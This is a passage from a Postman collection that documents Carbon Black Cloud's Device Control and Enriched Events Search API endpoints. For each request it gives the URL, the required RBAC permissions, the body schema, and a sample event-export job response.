Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","name":"Device Control API 🗝","type":"folder"}},"urlObject":{"path":["device_control","v3","orgs","{{cb_org_key}}","devices","_facet"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"5cf73ae9-56c8-4c34-8c8e-92ba27f3597e"}],"id":"e09c8874-8361-48e7-bc40-14bc3426c6dc","_postman_id":"e09c8874-8361-48e7-bc40-14bc3426c6dc","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","name":"Device Control API 🗝","type":"folder"}}},{"name":"Products","item":[{"name":"Get USB Device Vendors and Products Seen","id":"56be5b1c-d595-4b06-a1af-424135f433a4","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/device_control/v3/orgs/{{cb_org_key}}/products","description":"<p>Returns all vendors and products that have been seen for the organization.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>external-device.manage</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/device-control-api/#get-usb-device-vendors-and-products-seen\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","name":"Device Control API 🗝","type":"folder"}},"urlObject":{"path":["device_control","v3","orgs","{{cb_org_key}}","products"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"56be5b1c-d595-4b06-a1af-424135f433a4"}],"id":"d1eaefa7-ec1e-4bf0-8194-e69c7a3dcb25","_postman_id":"d1eaefa7-ec1e-4bf0-8194-e69c7a3dcb25","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","name":"Device Control API 🗝","type":"folder"}}}],"id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","description":"<h1 id=\"device-control\">Device Control</h1>\n<h2 id=\"overview\">Overview</h2>\n<p>The Device Control API lets you view, manage, approve and implement blocking policies across your organization for external USB storage devices. This gives IT and Security Operations administrators direct access to the external devices in their environment to change how those devices can operate.</p>\n<h3 id=\"use-cases\">Use Cases</h3>\n<ul>\n<li>Retrieve an inventory of external devices and their associated metadata within an organization</li>\n<li>Search for a specific external device and its associated metadata</li>\n<li>Create an approval for an external device, set of devices, or for specific vendor and product models</li>\n<li>Cross reference additional external device data after an alert</li>\n</ul>\n<h3 id=\"requirements\">Requirements</h3>\n<ul>\n<li>Carbon Black Cloud Endpoint Standard</li>\n<li>Windows 3.6.0.1897 sensor or above</li>\n<li>All API calls require an API key with appropriate permissions see Authentication</li>\n</ul>\n<h2 id=\"authentication\">Authentication</h2>\n<ul>\n<li><strong>Access Level:</strong> Before you create your API Key, you need to create a “Custom” Access Level:<ul>\n<li>for the category Device Control &gt; Manage Enforcement &gt; “external-device.enforce”, allow permission to <code>UPDATE</code> (or see each call below for individual requirements)</li>\n<li>for the category Device Control &gt; Manage External Devices &gt; “external-device.manage”, allow permission to <code>CREATE</code>, <code>READ</code>, <code>UPDATE</code>, <code>DELETE</code> (or see each call below for individual requirements)</li>\n<li>for the category Policies &gt; Policies &gt; “org.policies”, allow permission to <code>CREATE</code>, <code>READ</code>, <code>UPDATE</code>, <code>DELETE</code> (or see each call below for individual requirements)</li>\n</ul>\n</li>\n<li><strong>API Key:</strong> When you create your API Key, use the Access Level Type of “Custom”, then select the Access Level you created.</li>\n<li><strong>Environment:</strong> use the URL of your Carbon Black Cloud console (this is the Dashboard URL)</li>\n<li><strong>API Route:</strong> {cbc-hostname}/device_control/v3/orgs/{org_key}/approvals/{id}</li>\n</ul>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":false},"event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"b1178d49-2662-4974-892a-5d0a41ea17d2"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"6a98a3f7-fdc7-4334-a1cf-f46dd26251de"}}],"_postman_id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb"},{"name":"Enriched Events Search API","item":[{"name":"Start Aggregation Search on Enriched Events (v1)","event":[{"listen":"test","script":{"exec":["pm.test(\"Automatically updated cb_job_id with result.\", function () {","    var data = pm.response.json();","","    pm.response.to.have.status(200);","    pm.environment.set(\"cb_job_id\", data.job_id);","});"],"type":"text/javascript","id":"c22ae49c-c550-499a-925e-68c205940d32"}}],"id":"50d90943-743a-4374-9c07-d9252bad5a87","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"query\": \"process_hash:0fb7e2661ad9c52dc97e3f7c0d615c22e2e4e298ef8e1a41c7fa1fc642cc60bc\",\n    \"rows\": 500\n}"},"url":"{{cb_url}}/api/investigate/v1/orgs/{{cb_org_key}}/enriched_events/aggregation_jobs/{{cb_aggregation_field}}","description":"<p>Starts a search that groups results by the field supplied in the <code>aggregation_field</code> element of the path.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"body-schema\">Body Schema</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Field</th>\n<th>Definition</th>\n<th>Data Type</th>\n<th>Values</th>\n<th>Required</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td><code>criteria</code></td>\n<td>Criteria is an object that represents values that must be in the results. Either <code>query</code> or <code>criteria</code>/<code>exclusion</code> must be included.</td>\n<td>Object</td>\n<td><code>{   \"process_name\": [     \"chrome.exe\"   ] }</code></td>\n<td>No</td>\n</tr>\n<tr>\n<td><code>exclusions</code></td>\n<td>Exclusions is a map that represents values that must not be in the results. Either <code>query</code> or <code>criteria</code>/<code>exclusion</code> must be included.</td>\n<td>Object</td>\n<td><code>{   \"process_name\": [     \"chrome.exe\"   ] }</code></td>\n<td>No</td>\n</tr>\n<tr>\n<td><code>fields</code></td>\n<td>A list of fields to include in the results, specify <code>*</code> to return all the default fields and add additional fields that are not returned by default</td>\n<td>Array</td>\n<td><code>[ \"*\", \"process_start_time\" ]</code> <strong>Default:</strong> <code>[\"*\"]</code></td>\n<td>No</td>\n</tr>\n<tr>\n<td><code>query</code></td>\n<td>Query in lucene syntax and/or including value searches. Either <code>query</code> or <code>criteria</code>/<code>exclusion</code> must be included.</td>\n<td>String</td>\n<td>N/A</td>\n<td>No</td>\n</tr>\n<tr>\n<td><code>rows</code></td>\n<td>Number of rows to request, can be paginated</td>\n<td>Long</td>\n<td><strong>Default:</strong> <code>500</code> <strong>Max:</strong> <code>10k</code></td>\n<td>No</td>\n</tr>\n<tr>\n<td><code>sort</code></td>\n<td>Sort is a collection of sort parameters that specify a <code>field</code> and <code>order</code> to sort the results.</td>\n<td>Array</td>\n<td><code>[{   \"field\": \"device_timestamp\",   \"order\": \"asc\" }]</code></td>\n<td>No</td>\n</tr>\n<tr>\n<td><code>start</code></td>\n<td>First row to use for pagination</td>\n<td>Long</td>\n<td><strong>Default:</strong> <code>0</code></td>\n<td>No</td>\n</tr>\n<tr>\n<td><code>time_range</code></td>\n<td>Describes a time window to restrict the search to match using <code>device_timestamp</code> as the reference. Window will take priority over start and end if provided.</td>\n<td>Object</td>\n<td><code>{   \"end\": \"2020-01-21T18:34:04Z\",   \"start\": \"2020-01-18T18:34:04Z\",   \"window\": \"-2w\" }</code></td>\n<td>No</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-enriched-events/#start-aggregation-search-on-enriched-events-v1\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"8caad943-6f73-4c8f-bf44-fb6357f7639e","id":"8caad943-6f73-4c8f-bf44-fb6357f7639e","name":"Enriched Events Search API","type":"folder"}},"urlObject":{"path":["api","investigate","v1","orgs","{{cb_org_key}}","enriched_events","aggregation_jobs","{{cb_aggregation_field}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"50d90943-743a-4374-9c07-d9252bad5a87"},{"name":"Retrieve Results for an Enriched Event Aggregation Search (v1)","id":"46854b75-981d-4387-b7eb-2e360a4cbe74","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":""},"url":"{{cb_url}}/api/investigate/v1/orgs/{{cb_org_key}}/enriched_events/aggregation_jobs/{{cb_job_id}}/results","description":"<p>Retrieves the aggregated enriched events search results for a given job_id. Results will be sorted based on the sort parameter used when starting the search. Confirm the search has completed by verifying that “contacted” equals “completed”.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-enriched-events/#retrieve-results-for-an-enriched-event-aggregation-search-v1\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"8caad943-6f73-4c8f-bf44-fb6357f7639e","id":"8caad943-6f73-4c8f-bf44-fb6357f7639e","name":"Enriched Events Search API","type":"folder"}},"urlObject":{"path":["api","investigate","v1","orgs","{{cb_org_key}}","enriched_events","aggregation_jobs","{{cb_job_id}}","results"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"46854b75-981d-4387-b7eb-2e360a4cbe74"},{"name":"Start an Enriched Events Search (v2)","event":[{"listen":"test","script":{"exec":["pm.test(\"Automatically updated cb_job_id with result.\", function () {","    var data = pm.response.json();","","    pm.response.to.have.status(200);","    pm.environment.set(\"cb_job_id\", data.job_id);","});"],"type":"text/javascript","id":"a4a4fb1e-f3d9-4c96-b0e6-cf17fd4143af"}}],"id":"8951b390-5c37-4b57-9c3e-36245f47c59d","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"criteria\": \"<object>\",\n    \"exclusions\": \"<object>\",\n    \"fields\": [\"<string>\", \"<string>\"],\n    \"query\": \"<string>\",\n    \"rows\": \"<long>\",\n    \"sort\": [\n        {\n            \"field\": \"<string>\",\n            \"order\": \"<string>\"\n        },\n        {\n            \"field\": \"<string>\",\n            \"order\": \"<string>\"\n        }\n    ],\n    \"start\": \"<long>\",\n    \"time_range\": {\n        \"end\": \"<string>\",\n        \"start\": \"<string>\",\n        \"window\": \"<string>\"\n    }\n}"},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/enriched_events/search_jobs","description":"<p>Creates an enriched events search job. The results for the search job may be requested using the job_id returned.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-enriched-events/#start-an-enriched-events-search-v2\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"8caad943-6f73-4c8f-bf44-fb6357f7639e","id":"8caad943-6f73-4c8f-bf44-fb6357f7639e","name":"Enriched Events Search API","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","enriched_events","search_jobs"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"8951b390-5c37-4b57-9c3e-36245f47c59d"},{"name":"Retrieve Results for an Enriched Events Search (v2)","id":"43e9767a-4528-46ee-998b-1917b442212e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":""},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/enriched_events/search_jobs/{{cb_job_id}}/results","description":"<p>Retrieves the results of an enriched event search specified by a job_id. Results will be sorted based on the sort parameter used when starting the search. Confirm the job has completed by verifying that “contacted” equals “completed”.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-enriched-events/#retrieve-results-for-an-enriched-events-search-v2\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"8caad943-6f73-4c8f-bf44-fb6357f7639e","id":"8caad943-6f73-4c8f-bf44-fb6357f7639e","name":"Enriched Events Search API","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","enriched_events","search_jobs","{{cb_job_id}}","results"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"43e9767a-4528-46ee-998b-1917b442212e"},{"name":"Start a Facet Search on Enriched Events (v2)","event":[{"listen":"test","script":{"exec":["pm.test(\"Automatically updated cb_job_id with result.\", function () {","    var data = pm.response.json();","","    pm.response.to.have.status(200);","    pm.environment.set(\"cb_job_id\", data.job_id);","});"],"type":"text/javascript","id":"b46310f7-b4e7-4f28-a1e7-f0feaf812ecf"}}],"id":"84dfced7-574b-4452-bd0f-2d51e34815f3","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"event_ids\": [\n    \"<string>\"\n  ]\n}"},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/enriched_events/facet_jobs","description":"<p>Creates an enriched events facet search. A facet search provides statistics indicating the relative weighting of values for the specified terms.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-enriched-events/#start-a-facet-search-on-enriched-events-v2\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"8caad943-6f73-4c8f-bf44-fb6357f7639e","id":"8caad943-6f73-4c8f-bf44-fb6357f7639e","name":"Enriched Events Search API","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","enriched_events","facet_jobs"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"84dfced7-574b-4452-bd0f-2d51e34815f3"},{"name":"Retrieve Results for an Enriched Events Facet Search (v2)","id":"26313d42-e433-4ca1-9668-73e30795a329","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":""},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/enriched_events/facet_jobs/{{cb_job_id}}/results","description":"<p>Retrieves the enriched events facet results for a given job_id. Confirm the search has completed by verifying that “contacted” equals “completed”.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-enriched-events/#retrieve-results-for-an-enriched-events-facet-search-v2\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"8caad943-6f73-4c8f-bf44-fb6357f7639e","id":"8caad943-6f73-4c8f-bf44-fb6357f7639e","name":"Enriched Events Search API","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","enriched_events","facet_jobs","{{cb_job_id}}","results"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"26313d42-e433-4ca1-9668-73e30795a329"},{"name":"Request Details for Enriched Events (v2)","event":[{"listen":"test","script":{"exec":["pm.test(\"Automatically updated cb_job_id with result.\", function () {","    var data = pm.response.json();","","    pm.response.to.have.status(200);","    pm.environment.set(\"cb_job_id\", data.job_id);","});"],"type":"text/javascript","id":"00c6e2c4-b46d-4bce-b8f2-70c7b5991926"}}],"id":"1fc7513b-1ce0-47b0-9b7b-d1db49b84612","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"event_ids\": [\n    \"<string>\"\n  ]\n}"},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/enriched_events/detail_jobs","description":"<blockquote>\n<p><em>Note: This call is for <strong>preview only</strong> and may be subject to unannounced updates.</em></p>\n</blockquote>\n<p>Initiates a request to retrieve detail fields for enriched events. The fields returned include all available information about the given event and information not returnable from the standard enriched events search. In the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-fields\">Platform Search Fields guide</a>, these fields are marked with <code>ENRICHED_EVENTS DETAILS</code> . Fields marked with <code>DETAILS</code> can be returned on a <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-processes/#request-details-of-processes-v2\">Details Search on Processes</a>. Use the returned job_id to request results for a details search.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-enriched-events/#request-details-for-enriched-events-v2\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"8caad943-6f73-4c8f-bf44-fb6357f7639e","id":"8caad943-6f73-4c8f-bf44-fb6357f7639e","name":"Enriched Events Search API","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","enriched_events","detail_jobs"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"1fc7513b-1ce0-47b0-9b7b-d1db49b84612"},{"name":"Retrieve Results for an Enriched Event Detail Search (v2)","id":"ee7d1c6a-fb62-4be1-a33d-de46d3713320","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":""},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/enriched_events/detail_jobs/{{cb_job_id}}/results","description":"<blockquote>\n<p><em>Note: This call is for <strong>preview only</strong> and may be subject to unannounced updates.</em></p>\n</blockquote>\n<p>Retrieves the enriched event detail results for a given job_id. Confirm the search has completed by verifying that “contacted” equals “completed”.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-enriched-events/#retrieve-results-for-an-enriched-event-detail-search-v2\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"8caad943-6f73-4c8f-bf44-fb6357f7639e","id":"8caad943-6f73-4c8f-bf44-fb6357f7639e","name":"Enriched Events Search API","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","enriched_events","detail_jobs","{{cb_job_id}}","results"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"ee7d1c6a-fb62-4be1-a33d-de46d3713320"},{"name":"Export Enriched Events Search Results with Jobs Service","id":"1135ec84-0a44-497a-b558-ba53591923f6","protocolProfileBehavior":{"disableBodyPruning":true,"disabledSystemHeaders":{}},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"api_resource\": \"ENRICHED_EVENTS\",\n    \"version\": \"v2\",\n    \"query\": {\n        \"criteria\": {},\n        \"exclusions\": {},\n        \"query\": \"*:*\",\n        \"time_range\": {\n            \"start\": \"2023-03-26T02:00:00.000Z\",\n            \"end\": \"2023-03-29T02:06:20.864Z\"\n        },\n        \"rows\": 10000,\n        \"fields\": [\n            \"*\"\n        ],\n        \"sort\": [\n            {\n                \"field\": \"device_timestamp\",\n                \"order\": \"DESC\"\n            }\n        ]\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/jobs/v1/orgs/{{cb_org_key}}/jobs/start/event_export","description":"<p>This is a specific example for exporting Enriched Events which uses the generic Jobs Service. The sequence to use the jobs services is</p>\n<ol>\n<li>Start an Export Event Job (this call)</li>\n<li>Check the job has completed with Get Job Progress</li>\n<li>Download the Job Output. The response is a zipped csv file of results.</li>\n</ol>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>jobs.status</td>\n<td>READ</td>\n</tr>\n<tr>\n<td>org.search.events</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p>Full documentation is available on the <a href=\"https://developer.carbonblack.com/\">Developer Network</a></p>\n<ul>\n<li><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/job-service-api/\">Job Service API</a></li>\n<li><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/platform-search-api-enriched-events/\">Enriched Events API</a></li>\n</ul>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"8caad943-6f73-4c8f-bf44-fb6357f7639e","id":"8caad943-6f73-4c8f-bf44-fb6357f7639e","name":"Enriched Events Search API","type":"folder"}},"urlObject":{"path":["jobs","v1","orgs","{{cb_org_key}}","jobs","start","event_export"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"a64cff70-110a-430c-a025-ab905afaaaba","name":"Export Enriched Events Search Results with Jobs Service","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"api_resource\": \"ENRICHED_EVENTS\",\n    \"version\": \"v2\",\n    \"query\": {\n        \"criteria\": {},\n        \"exclusions\": {},\n        \"query\": \"*:*\",\n        \"time_range\": {\n            \"start\": \"2023-03-26T02:00:00.000Z\",\n            \"end\": \"2023-03-29T02:06:20.864Z\"\n        },\n        \"rows\": 10000,\n        \"fields\": [\n            \"*\"\n        ],\n        \"sort\": [\n            {\n                \"field\": \"device_timestamp\",\n                \"order\": \"DESC\"\n            }\n        ]\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/jobs/v1/orgs/{{cb_org_key}}/jobs/start/event_export"},"status":"Created","code":201,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"id\": 5731500,\n    \"type\": \"event_export\",\n    \"job_parameters\": {\n        \"job_parameters\": {\n            \"query\": {\n                \"criteria\": {},\n                \"exclusions\": {},\n                \"query\": \"*:*\",\n                \"time_range\": {\n                    \"start\": \"2023-03-26T02:00:00.000Z\",\n                    \"end\": \"2023-03-29T02:06:20.864Z\"\n                },\n                \"rows\": 10000,\n                \"fields\": [\n                    \"*\"\n                ],\n                \"sort\": [\n                    {\n                        \"field\": \"device_timestamp\",\n                        \"order\": \"DESC\"\n                    }\n                ]\n            }\n        },\n        \"process_guid\": null,\n        \"api_resource\": \"ENRICHED_EVENTS\",\n        \"version\": \"v2\",\n        \"search_id\": null\n    },\n    \"connector_id\": \"12345ABCD\",\n    \"org_key\": \"ABCD1234\",\n    \"status\": \"CREATED\",\n    \"create_time\": \"2023-03-29T03:24:30.046Z\",\n    \"last_update_time\": \"2023-03-29T03:24:30.046Z\"\n}"}],"_postman_id":"1135ec84-0a44-497a-b558-ba53591923f6"}],"id":"8caad943-6f73-4c8f-bf44-fb6357f7639e","description":"<h1 id=\"enriched-events-search-api\">Enriched Events Search API</h1>\n<h2 id=\"overview\">Overview</h2>\n<p>This API lets you search through all the data that is reported by your organization’s Endpoint Standard-enabled sensors to find one or more specific enriched events that match the consumer’s search criteria. You can:</p>\n<ul>\n<li>See tactics, techniques and procedures (TTPs) and the MITRE CVEs associated with potentially malicious activity</li>\n<li>Get visibility into the cyber kill chain stage at which attacks were stopped</li>\n<li>Identify the family and name of malware observed and stopped on your organization’s endpoints</li>\n</ul>\n<h3 id=\"use-cases\">Use cases</h3>\n<ul>\n<li>Isolate the events associated with a specific CB Analytics Alert, find all events that led up to or were initiated after malicious or unwanted actions occurred, or find the events that the sensor initiated that specifically denied or terminated unwanted behavior with an <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-enriched-events/#start-an-enriched-events-search-v2\">Enriched Events Search</a></li>\n<li>Look for patterns and prevalence of unusual activity across all the organization’s endpoints with a <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-enriched-events/#start-a-facet-search-on-enriched-events-v2\">Facet Search on Enriched Events</a></li>\n</ul>\n<p>Alternative solutions for Endpoint Standard and Enterprise EDR customers:</p>\n<ul>\n<li>If you want to search for Processes and Events associated with a Process, use the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-processes\">Process Search API</a>.</li>\n<li>If you want to export alert or event data in bulk, use the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/eventforwarder-api\">Event Forwarder Configuration API</a> to forward data to an AWS S3 bucket.</li>\n</ul>\n<h3 